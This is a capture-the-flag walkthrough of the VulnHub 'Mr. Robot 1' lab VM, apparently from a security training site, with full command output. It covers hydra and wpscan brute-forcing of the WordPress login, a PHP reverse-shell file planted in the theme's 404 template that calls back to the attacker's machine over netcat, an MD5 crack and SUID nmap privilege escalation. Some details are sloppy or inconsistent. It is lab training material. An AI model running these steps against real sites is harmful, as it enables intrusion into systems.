Mr. Robot is an popular TV series mainly popular for an elite hacker Ellon Elliot. Today we will show a CTF (Capture the flag), as demonstrated by Ethical hacking student of International Institute of Cyber Security.
- For testing we will use Kali Linux 2019.1 amd64 & Mr. Robot 1. Download Kali from : https://www.kali.org/downloads/
- Download Mr. robot 1 https://www.vulnhub.com/entry/mr-robot-1,151/ We are using Virtual box for completing this CTF.
- Download Virtual box from : https://www.virtualbox.org/
- After downloading open mr.robot vm. Start the VM.
- After then Mr. Robot 1 VM will start.
- Change Mr.robot 1 VM adapter settings to bridge adapter.
- After changing the network settings. Open Kali Linux & type netdiscover command to find out open IP addresses, this will help to find Mr. Robot VM IP address.
- Here 192.168.1.4 is our target. Open web browser type 192.168.1.4
- For further information gathering. We will use sitemap generator files to find which pages are allowed to access. Type 192.168.1.4/robots.txt
- Opening this 192.168.1.4 in browser, opens this.
- On Kali, Open terminal type wget 192.168.1.4/fsocity.dic
- And then type wget 192.168.1.4/key-1-of-3.txt
root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/fsocity.dic --2019-09-28 01:44:33-- https://192.168.1.4/fsocity.dic Connecting to 192.168.1.4:80… connected. HTTP request sent, awaiting response… 200 OK Length: 7245381 (6.9M) Saving to: ‘fsocity.dic’ fsocity.dic 100%[==================================================>] 6.91M 35.8MB/s in 0.2s 2019-09-28 01:44:34 (35.8 MB/s) - ‘fsocity.dic’ saved [7245381/7245381] root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/key-1-of-3.txt --2019-09-28 01:44:54-- https://192.168.1.4/key-1-of-3.txt Connecting to 192.168.1.4:80… connected. HTTP request sent, awaiting response… 200 OK Length: 33 Saving to: ‘key-1-of-3.txt’ key-1-of-3.txt 100%[==================================================>] 33 --.-KB/s in 0s 2019-09-28 01:44:54 (4.68 MB/s) - ‘key-1-of-3.txt’ saved [33/33]
- Here we have 1st key. Type cat key-1-of-3.txt
- According to Ethical hacking researcher of International Institute of Cyber Security, getting key is easy if you are clear on the concepts.
root@kali:/home/iicybersecurity/Desktop# cat key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9
- For getting rest of two keys. So now we have to access Mr.robot 1 VM.
- Type cat fsocity.dic
root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic true false wikia from the now Wikia extensions scss window http var page Robot Elliot styles and document mrrobot com ago function eps1 null chat user Special GlobalNavigation images net push category Alderson lang nocookie ext his output SLOTNAME
- Type cat fsocity.dic | sort -u | uniq > wordlist.dic for creating wordlist.
root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic | sort -u | uniq > wordlist.dic root@kali:/home/iicybersecurity/Desktop#
- Now we will use nikto, Type nikto -h 192.168.1.4 for finding allowed webpages.
- 192.168.1.4 is our target.
root@kali:/home/iicybersecurity/Desktop# nikto -h 192.168.1.4 - Nikto v2.1.6 Target IP: 192.168.1.4 Target Hostname: 192.168.1.4 Target Port: 80 + Start Time: 2019-09-28 01:55:04 (GMT-4) Server: Apache The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type Retrieved x-powered-by header: PHP/5.5.29 No CGI Directories found (use '-C all' to force check all possible dirs) Uncommon header 'tcn' found, with contents: list Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See https://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php OSVDB-3092: /admin/: This might be interesting… Uncommon header 'link' found, with contents: https://192.168.1.4/?p=23; rel=shortlink /wp-links-opml.php: This WordPress script reveals the installed version. OSVDB-3092: /license.txt: License file found may identify site software. /admin/index.html: Admin login page/section found. Cookie wordpress_test_cookie created without the httponly flag /wp-login/: Admin login page/section found. /wordpress: A WordPress installation was found. /wp-admin/wp-login.php: WordPress login found /wordpresswp-admin/wp-login.php: WordPress login found /blog/wp-login.php: WordPress login found /wp-login.php: WordPress login found /wordpresswp-login.php: WordPress login found 7915 requests: 0 error(s) and 18 item(s) reported on remote host + End Time: 2019-09-28 01:58:38 (GMT-4) (214 seconds) 1 host(s) tested
- For getting Login credentials. We will use hydra which is inbuilt in Kali Linux.
- Type hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
- -V is used for verbose mode.
- -L is used for Login name, we are using wordlist we created above
- -p is used to try password 123.
- Hydra will return with http-post-form. As target has already allowed login page.
root@kali:/home/iicybersecurity/Desktop# hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form '/news.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-28 02:02:19 [DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task
[DATA] attacking http-post-form://192.168.1.4:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username
[ATTEMPT] target 192.168.1.4 - login "000" - pass "123" - 1 of 11452 [child 0] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000000" - pass "123" - 2 of 11452 [child 1] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000080" - pass "123" - 3 of 11452 [child 2] (0/0)
[ATTEMPT] target 192.168.1.4 - login "001" - pass "123" - 4 of 11452 [child 3] (0/0)
[ATTEMPT] target 192.168.1.4 - login "002" - pass "123" - 5 of 11452 [child 4] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003" - pass "123" - 6 of 11452 [child 5] (0/0)
[ATTEMPT] target 192.168.1.4 - login "0032" - pass "123" - 7 of 11452 [child 6] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003s" - pass "123" - 8 of 11452 [child 7] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004" - pass "123" - 9 of 11452 [child 8] (0/0)
[ATTEMPT] target 192.168.1.4 - login "00480" - pass "123" - 10 of 11452 [child 9] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004s" - pass "123" - 11 of 11452 [child 10] (0/0)
[ATTEMPT] target 192.168.1.4 - login "005s" - pass "123" - 12 of 11452 [child 11] (0/0)
[ATTEMPT] target 192.168.1.4 - login "006s" - pass "123" - 13 of 11452 [child 12] (0/0)
[ATTEMPT] target 192.168.1.4 - login "embed" - pass "123" - 5488 of 11452 [child 8] (0/0)[80][http-post-form] host: 192.168.1.4 login: Elliot password: 123 [80][http-post-form] host: 192.168.1.4 login: elliot password: 123 [ATTEMPT] target 192.168.1.4 - login "Embedded" - pass "123" - 5489 of 11452 child 4 [80][http-post-form] host: 192.168.1.4 login: ELLIOT password: 123 [ATTEMPT] target 192.168.1.4 - login "embodiment" - pass "123" - 5490 of 11452 child 2
- After getting username – Elliot. Now we will find password.
- For that we will use WPScan for finding.
- WPScan is also an inbuilt tool of Kali Linux for cracking passwords.
- Type wpscan –url 192.168.1.4 –passwords /home/iicybersecurity/Desktop/wordlist.dic –usernames Elliot
- –url – 192.168.1.4 is our target.
- –passwords – wordlist.dic is used which we have created above.
- –username – Elliot is found using hydra.
root@kali:/home/iicybersecurity/Desktop# wpscan --url 192.168.1.4 --passwords /home/iicybersecurity/Desktop/wordlist.dic --usernames Elliot
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.1.4/ [+] Started: Sat Sep 28 02:07:13 2019 Interesting Finding(s): [+] https://192.168.1.4/ | Interesting Entries: | - Server: Apache | - X-Mod-Pagespeed: 1.9.32.3-4523 | Found By: Headers (Passive Detection) | Confidence: 100% [+] https://192.168.1.4/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] https://192.168.1.4/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - https://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] https://192.168.1.4/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] https://192.168.1.4/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.3.20 identified (Latest, released on 2019-09-05). | Detected By: Rss Generator (Aggressive Detection) | - https://192.168.1.4/feed/, https://wordpress.org/?v=4.3.20 | - https://192.168.1.4/comments/feed/, https://wordpress.org/?v=4.3.20 [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=============================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc Multicall against 1 user/s [SUCCESS] - Elliot / ER28-0652 All Found Progress Time: 00:00:19 <================================== > (12 / 22) 54.54% ETA: ??:??:?? [i] Valid Combinations Found: | Username: Elliot, Password: ER28-0652 [+] Finished: Sat Sep 28 02:07:35 2019 [+] Requests Done: 63 [+] Cached Requests: 5 [+] Data Sent: 14.907 KB [+] Data Received: 1.282 MB [+] Memory used: 183.5 MB [+] Elapsed time: 00:00:21
- WPScan has find the password of login credentials. Now we will use this Login username – Elliot & Password – ER28-0652
- Above you can see that login page has opened.
- Now we have to find remaining 2 keys.
- For that we need remote shell of this login. For that we have to upload php file on hacked server using WordPress login password.
- For creating php file go to : https://pentestmonkey.net/tools/web-shells/php-reverse-shell
- Download the reverse shell code open terminal. Type wget https://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz
- You can also create your own PHP reserve shell, which is offered in exploit courses offered by International Institute of Cyber Security.
root@kali:/home/iicybersecurity/Downloads# wget https://pentestmonkey.net/tools/php-reverse-shell1.0.tar.gz --2019-09-30 02:01:28-- https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0. Resolving pentestmonkey.net (pentestmonkey.net)… 213.165.242.10, 2001:bd0:100:0:1::1 Connecting to pentestmonkey.net (pentestmonkey.net)|213.165.242.10|:80… connected. HTTP request sent, awaiting response… 200 OK Length: 9018 (8.8K) [application/x-gzip] Saving to: ‘php-reverse-shell-1.0.tar.gz’ php-reverse-shell-1.0.tar.gz 100%[=============================================>] 8.81K --.-K 2019-09-30 02:01:29 (14.9 MB/s) - ‘php-reverse-shell-1.0.tar.gz’ saved [9018/9018]
- Type tar -xvzf php-reverse-shell-1.0.tar.gz
root@kali:/home/iicybersecurity/Downloads# tar -xvzf php-reverse-shell-1.0.tar.gz php-reverse-shell-1.0/ php-reverse-shell-1.0/COPYING.GPL php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL php-reverse-shell-1.0/php-reverse-shell.php php-reverse-shell-1.0/CHANGELOG
- Type cd php-reverse-shell-1.0/ && ls
root@kali:/home/iicybersecurity/Downloads# cd php-reverse-shell-1.0/ root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# ls CHANGELOG COPYING.GPL COPYING.PHP-REVERSE-SHELL php-reverse-shell.php
- Upload php-reverse-shell.php to 404 Template. While Uploading change IP address & port no. Type 192.168.1.2 as our Kali Linux IP address & Port 4444
- Go to wordpress page & upload the php file go to Appearance < Editor & Go to Appearence < Editor < 404 Template
- Copy the php-reverse-shell<dot>php file.
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See https://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.2'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
==================================================
=================== SNIPPED ======================
==================================================
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>- Open terminal Type nc -lvp 4444 on kali terminal
- Open web browser & type https://192.168.1.4/wpcontent/themes/twentyfifteen/404.php
- As you will type netcat command. You will get reverse shell of Mr. Robot VM.
root@kali:/home/iicybersecurity/Downloads/php-reverse-shell-1.0# nc -lvp 4444 listening on [any] 4444 … 192.168.1.4: inverse host lookup failed: Unknown host connect to [192.168.1.2] from (UNKNOWN) [192.168.1.4] 48232 Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 G 06:32:42 up 1:37, 0 users, load average: 0.02, 0.07, 0.07 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off
- Type ls
$ ls bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz $ pwd pwd /
- Type python -c ‘import pty; pty.spawn(“/bin/sh”)’ for getting access to robot directory.
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ ls
ls
robot
- Now we have search further & we have found the 2nd key in robot directory type cd /robot && ls
$ pwd pwd /home/robot $ ls ls key-2-of-3.txt password.raw-md5 $ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 $ cat password.raw-md5 cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
- Above it shows that 2nd key is encrypted with raw.md5 hash. Go to crackstation.net. And type the 2nd key.
- Click on crack hashes.
- As you can see the Result shows alphabetic characters. abcdefghijklmnopqrstuvwxyz
- Type su – robot & enter the password.
$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz
- Type find / -perm -u=s -type f 2>/dev/null to find the 3rd key.
$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown
- Above command has shown many files but we are more interested in /usr/local/bin/nmap
- Type nmap –interactive && !sh. And you will see that we have got root privileges.
$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( https://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h for help nmap> !sh !sh #
- Type cd /root && ls
- Type cat key-3-of-3.txt
$ pwd pwd /root cd /root cd /root # ls firstboot_done key-3-of-3.txt # cat key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4
- As you can see we have found the third key.
- We have found 3 Keys in 1st key was in https://192.168.1.4/robots.txt
- 2nd key was in robot directory
- 3rd key was in root directory.
- As per ethical hacking researcher of International Institute of Cyber Security, CTF challenges are good way to practice your hacking skills..
key-1-of-3.txt - 073403c8a58a1f80d943455fb30724b9 key-2-of-3.txt - 822c73956184f694993bede3eb39f959 key-3-of-3.txt - 04787ddef27c3dee1ee161b21670b4e4
He is a well-known expert in mobile security and malware analysis. He studied Computer Science at NYU and started working as a cyber security analyst in 2003. He is actively working as an anti-malware expert. He also worked for security companies like Kaspersky Lab. His everyday job includes researching about new malware and cyber security incidents. Also he has deep level of knowledge in mobile security and mobile vulnerabilities.
